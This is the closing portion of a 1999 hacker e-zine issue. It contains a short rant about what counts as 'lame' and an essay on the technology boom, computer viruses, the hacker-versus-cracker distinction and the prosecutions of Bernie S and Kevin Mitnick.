Lame? Or Not Lame!? ============================ What is lame!? No one really knows anymore. It used to be something so easy its not even fun. If its fun, and everyone is using it.. its not lame now is it!? Now if a so called "lamer" is using this program, and abusing it.. you think its lame.. thats todays definition of lameness. Today lame is something that is sooo popular and trendy and all the lamer kids are using, thats what lame is today. Personally I think that if it works, use it.. and naturally people are going to choose the easy way over the hard way. But me on the other hand, I enjoy a challenge, and I like to think.. What do you think is lame!? Send me an e-mail and tell me: kleptic@grex.org ============================= The End Of The Story ============================= Well, thats it.. I hoped you enjoyed my little ranting.. if you have any ideas for the next installment please e-mail me some info: kleptic@grex.org Thanx -= KLEPTIC =- kleptic@grex.org ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 10::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Conclusion: For a change we decided to include something different. Thanks EarthShaman; Technology Revolution The other type of revolution is that of New Technology. Now a days there has become a big boom in technology. Calculators have moved up from the bulky abacus, to the cheap and affordable tool used by almost everyone on a daily basis. There are satellites that provide Entertainment, and aid in forecasting weather. Commun- ication via satellites is a relatively new thing, but any people are harnessing it's power. Power such as cellular phone, video phones, wireless computer communication, and Global Positioning Systems have all become available via satellites. Another power of Satellites is that of Military and Government. Anyone remember the 'star wars' project? Where satellites with munitions could take out missiles launched at the United States. Who's there to say there isn't already spy satellites out there that can follow you everywhere and peer into your 'secret' lives? (Movie Real Genius comes to mind). And all this eventually boils down to computers. Computers have evolved tremendously in 40 years, from the big warehouse computers that ran off of punch card programs. This is where the well known term "bug" came from. Where actual bugs crawled across or ate the vacuum tubes and caused shorts. Jumping ahead a few years to the some what affordable computers such as Tandy's TRS-80 Model 100. The first cheap 'laptop' computer. And now near the end of the century, there are a surplus of computers for any and every profession. Laptops, Palm computers and desktop computer have overrun today's society, with world wide companies competing for the "best" computer. But as always, for every up, there is a down. Computer Viruses have been in production since the origin of the computer. These small, yet complex lines of code, created by Crackers have made it to the headlines of media all around the world. Recently unleashed was the "Harmless" Melissa Macro virii, and of course the CIH virus, designed to rewrite Bios chips and "meltdown" computers world wide. (It ended up getting some 600,000 computers worldwide). Remember the good ole days when hackers (yes hackers, crackers are the malicious group of people). Created such viruses as the "Yankee Doodle Virus", that played a melody on one's internal computer speaker on July 4th? In recent years, the media has latched onto the "Cracker Crimes" and defaced the hacking community, by labeling everyone that does malicious things a "hacker". The sad this is that everyone believes the media. Examples of this is while I am sittin in #Hackerzlair or #Hackerhelp (dalnet), and people saunter in and ask us how to hack into someone's computer and delete things on it. I'm sure hackers have broken into computers before, just to prove they can(commin' from personal experience), then some of us send the Admin the hole in his system, and go along our merry ways. After all "gaining access" into computer systems is an activity of immense thinking and planning. Alas a favorite past time activity. Just recently the Clinton Administration has passed many laws regarding computer crime and even set up agencies to take these people down that commit crimes via computer. Often charging these people with nonsense crimes and holding them in prison for inappropriate sentences. Such as the case of BernieS, who was thrown in Jail, beaten and served an extremely long sentence for simply possessing a Rat Shack Tone Dialer with a modified crystal in it. Some even say it never had any batteries in it. And the famous Kevin Mitnick, who as done the crime of stealing cellular information, bus has been in jail for years with no trial, and given the same treatments as a rapist or murderer. In conclusion, technology has changed dramatically since the advent of the "chip". For better and for worse. You never know, maybe AI (Artificial Intelligence) shall rule the world in 2020, tables will turn and we shall all be slaves to the computers. Watch your back, ~EarthShaman Alittle bout the Author(like anyone gives a shit): ES has been working with computers since the dawn of TRS-80's, and has been online (started out bbs'in) since the late 80's. He is currently a Y2K Researcher/Consultant in central California. Known to frequent "dalnet's" #Hackerzlair and #hacker_help. Drop in and drop me a line if ya read this.